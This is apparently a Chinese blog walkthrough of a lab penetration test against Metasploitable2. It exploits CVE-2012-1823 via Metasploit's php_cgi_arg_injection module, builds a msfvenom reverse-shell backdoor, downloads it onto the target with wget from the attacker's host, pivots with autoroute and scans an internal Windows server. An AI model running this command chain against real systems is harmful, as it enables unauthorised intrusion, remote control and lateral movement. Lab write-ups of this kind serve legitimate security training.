2020-10-17

攻击机:Kali 192.168.109.137

靶机: Metasploitable2 192.168.109.159

内网另一台主机 Windows Server 2012

工具:Metasploit

目标计算机上的漏洞编号为CVE id 2012-1823,完整的名称为PHP-CGI查询字符串参数漏洞,根据PHP主页的信息,当PHP使用基于CGI的设置(如Apache的mod_cgid)时,php-cgi就会收到一个查询字符串参数作为命令行参数(这个命令行参数可以是-s、-d或者-c),它将被传递到php-cgi程序,从而导致源代码泄露和任意代码执行。因此,一个远程的、未经授权的攻击者可以借此获取敏感信息,利用目标计算机来进行Dos攻击,或者取得Web服务器执行任意代码的权限。

1.开启MSF

msfconsole

2.查找MSF中与CVE id 2012-1823漏洞匹配的模块

search "php 5.2.4"

3.对漏洞进行渗透

 
  1. use exploit/multi/http/php_cgi_arg_injection

  2. show options

  3. set RHOST 192.168.109.159

  4. show options

  5. show payloads

  6. set payload php/meterpreter/reverse_tcp

  7. show options

  8. set LHOST 192.168.109.137

  9. exploit

现在,我们攻克了IP地址为192.168.109.159的内部系统了,现在我们需要将Meterpreter提升为更高的权限

4.生成木马文件

在攻击机Kali上新开一个命令行终端,执行如下命令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.109.137 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

5.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中

 
  1. service apache2 start

  2. mv backdoor.elf /var/www/html/

这样,就可以让目标系统从我们的计算机中下载这个木马文件了。

6.在目标机上下载木马文件

切换到第3步的终端,执行命令:

 
  1. shell

  2. wget http://192.168.109.137/backdoor.elf

即将木马文件下载到了目标机上

7.在新开启的终端上执行如下命令

 
  1. msfconsole

  2. use exploit/multi/handler

  3. set payload linux/x86/meterpreter/reverse_tcp

  4. set LHOST 192.168.109.137

  5. set LPORT 4444

  6. exploit

8.在目标机上运行木马文件

切换到第3步的终端,执行命令:

 
  1. chmod 7777 backdoor.elf

  2. ./backdoor.elf

9.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们渗透内部网络。

10. 查看ARP内容

arp

由输出可以看出,内网中有另一主机IP地址为:192.168.109.141

为了渗透进入这个内部网络,需要在成功渗透的主机上使用autoroute命令来设置跳板。

11.设置跳板

在Meterpreter终端执行:

 
  1. run autoroute -p

  2. run autoroute -s 192.168.109.0 255.255.255.0

  3. run autoroute -p

此时,我们的MSF就可以通过这个Meterpreter会话连接到内部网络。

12.将Meterpreter会话切换到后台

background

13.对内网主机192.168.109.141进行端口扫描

 
  1. use auxiliary/scanner/portscan/tcp

  2. show options

  3. setg RHOSTS 192.168.109.141

  4. run

注意:设置RHOSTS的值时,这里使用的是setg命令,这样就会使RHOSTS的值设置为全局的192.168.109.141,从而无需反复输入这个命令。

这里,我们仅仅看到少数几个开发的端口,接下来,我们使用MSF中对应工具对常见的端口再进行详细的扫描。使用auxiliary/scanner/http/http_header模块对目标80和8080端口进行扫描,以发现在这两个端口上运行的服务。

14.查看在80、8080端口上运行的服务

 
  1. use auxiliary/scanner/http/http_header

  2. set RHOSTS 192.168.109.141

  3. set HTTP_METHOD GET

  4. run

  5. set RPORT 8080

  6. run

从输出中可以看到,目标计算机80端口上运行着最新的IIS 8.5, 这是一个很难渗透的服务器,因为并没有在这个服务器上发现高危的漏洞。不过,在8080端口上运行着HFS 2.3,这个软件存在着一个远程代码执行漏洞。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值